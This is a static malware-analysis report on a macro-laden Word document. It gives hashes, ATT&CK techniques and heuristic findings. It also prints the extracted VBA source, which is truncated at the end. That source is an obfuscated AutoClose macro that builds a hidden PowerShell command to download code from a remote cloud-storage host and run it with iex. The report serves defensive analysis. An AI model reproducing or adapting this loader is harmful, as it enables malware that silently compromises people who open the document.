Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a9d59acdabe2dc8e…

MALICIOUS

Office (OOXML)

245.6 KB Created: 2021-08-25 17:07:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-09-25
MD5: 28476abe4e8cf666f1f29304ac71b19d SHA-1: 6c72171ba98735dfe8f306e51d975e6db668564e SHA-256: a9d59acdabe2dc8e73330be12cba312d61ad912cbb7e92a78953ef4fc3236dad
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Office document was flagged as malicious. The file embeds external URLs that direct users to attacker-controlled resources. Specific URLs and indicators for this sample are listed in the indicators section.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7101 bytes
SHA-256: a7b0639dfd79e3cbe7e730c09158d562f0a02a425311beed2c2a3284c2edfca9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Tracking"
Sub AutoClose()
    Dim IO_LB As String
    JL_NB = Array("-", "e", "i", "c", "y", "b", "a", "s", " ", "w", "p", "d", "l", "h", "r", "x", "o", "n", "u", "t")
    Dim GS_TF As String
    GS_TF = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
    Dim ER_TE As String
    ER_TE = "QAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAe"
    IO_LB = IO_LB + JL_NB(10)
    IO_LB = IO_LB + JL_NB(16)
    Dim FT_LA As String
    FT_LA = "QBzAHQAZQB"
    Dim DM_MI As String
    DM_MI = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABp"
    IO_LB = IO_LB + JL_NB(9)
    IO_LB = IO_LB + JL_NB(1)
    Dim GO_SE As String
    GO_SE = "AG4AZwBdADoAOgBVAFQARgA4AC4ARwBl"
    GN_QI = GN_QI & GS_TF & ER_TE & FT_LA & DM_MI & GO_SE
    Dim IT_NB As String
    IT_NB = "AHQAUwB0AHIAaQBuAGcAKABbAFMAeQ"
    IO_LB = IO_LB + JL_NB(14)
    IO_LB = IO_LB + JL_NB(7)
    Dim BO_MG As String
    BO_MG = "BzAHQAZQBtAC4AQwBvAG4AdgBlAHIAd"
    Dim IQ_LC As String
    IQ_LC = "ABdADoA"
    IO_LB = IO_LB + JL_NB(13)
    IO_LB = IO_LB + JL_NB(1)
    Dim IL_TH As String
    IL_TH = "OgBGAHIAbwBtAEIAYQBzAGUANgA0AFM"
    Dim BO_PC As String
    BO_PC = "AdAByAGkAbgB"
    GN_QI = GN_QI & IT_NB & BO_MG & IQ_LC & IL_TH & BO_PC
    IO_LB = IO_LB + JL_NB(12)
    IO_LB = IO_LB + JL_NB(12)
    Dim GM_PJ As String
    GM_PJ = "nACgAJAB4ACkAKQB9A"
    Dim HQ_PI As String
    HQ_PI = "DsAaQBlAHgAIAAkACgAYQ"
    IO_LB = IO_LB + JL_NB(8)
    IO_LB = IO_LB + JL_NB(0)
    Dim DT_SE As String
    DT_SE = "AgACQAK"
    Dim DP_LG As String
    DP_LG = "AAkACgAJAAoAGkAb"
    IO_LB = IO_LB + JL_NB(9)
    IO_LB = IO_LB + JL_NB(2)
    Dim CM_LG As String
    CM_LG = "gB2AG8A"
    GN_QI = GN_QI & GM_PJ & HQ_PI & DT_SE & DP_LG & CM_LG
    Dim BN_NJ As String
    BN_NJ = "awBlAC0AdwBlAGIA"
    IO_LB = IO_LB + JL_NB(17)
    IO_LB = IO_LB + JL_NB(11)
    Dim CN_OF As String
    CN_OF = "cgBlAHEAdQBlA"
    Dim GP_SC As String
    GP_SC = "HMAdAAgACcAaAB0AHQAcABzADoALw"
    IO_LB = IO_LB + JL_NB(16)
    IO_LB = IO_LB + JL_NB(9)
    Dim HM_SJ As String
    HM_SJ = "AvAHUAcwB"
    Dim FL_LG As String
    FL_LG = "wAHIAZAA1A"
    GN_QI = GN_QI & BN_NJ & CN_OF & GP_SC & HM_SJ & FL_LG
    IO_LB = IO_LB + JL_NB(7)
    IO_LB = IO_LB + JL_NB(19)
    Dim BR_QC As String
    BR_QC = "DEANQAwAGMAZQB"
    Dim FM_TE As String
    FM_TE = "uAHQAcgBhAGwALgB0AGEAYgB"
    IO_LB = IO_LB + JL_NB(4)
    IO_LB = IO_LB + JL_NB(12)
    Dim FT_NH As String
    FT_NH = "sAGUALg"
    Dim DS_SJ As String
    DS_SJ = "BjAG8AcgBlAC4AdwBpAG4AZABvAHcAcw"
    IO_LB = IO_LB + JL_NB(1)
    IO_LB = IO_LB + JL_NB(8)
    Dim BS_SH As String
    BS_SH = "AuAG4AZQB0A"
    GN_QI = GN_QI & BR_QC & FM_TE & FT_NH & DS_SJ & BS_SH
    Dim CQ_LI As String
    CQ_LI = "C8AdwBhAHIAZQBoAG8Ad"
    IO_LB = IO_LB + JL_NB(13)
    IO_LB = IO_LB + JL_NB(2)
    Dim DL_PC As String
    DL_PC = "QBzAGUAPwAkAGYAaQBsAHQ"
    Dim HT_TF As String
    HT_TF = "AZQByAD0AUABhAHIAdABpAHQAaQBvAG4"
    IO_LB = IO_LB + JL_NB(11)
    IO_LB = IO_LB + JL_NB(11)
    Dim DL_SD As String
    DL_SD = "ASwBlAHkAJQAyADAA"
    Dim JO_NC As String
    JO_NC = "ZQBxACUAMgAwACUAMgA3AHMAd"
    GN_QI = GN_QI & CQ_LI & DL_PC & HT_TF & DL_SD & JO_NC
    IO_LB = IO_LB + JL_NB(1)
    IO_LB = IO_LB + JL_NB(17)
    Dim FL_RH As String
    FL_RH = "ABhAGcA"
    Dim BP_PF As String
    BP_PF = "ZQAlADIANwAmACQAUwBlAGwA"
    IO_LB = IO_LB + JL_NB(8)
    IO_LB = IO_LB + JL_NB(0)
    Dim DK_TD As String
    DK_TD = "ZQBjAHQAPQBkAGEAdA"
    Dim FT_OC As String
    FT_OC = "BhACYAcwB2AD0AMgAwADEANwAtADAAN"
    IO_LB = IO_LB + JL_NB(1)
    IO_LB = IO_LB + JL_NB(15)
    Dim IT_SD As String
    IT_SD = "AAtADEANwAmAHMAcwA9A"
    GN_QI = GN_QI & FL_RH & BP_PF & DK_TD & FT_OC & IT_SD
    Dim AM_OH As String
    AM_
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 20992 bytes
SHA-256: 962f851ece639d82e09d3960b91a1cdb59a74c96c006e0045428cf173c19f803

Open this report in the interactive analyzer, or submit your own file for analysis.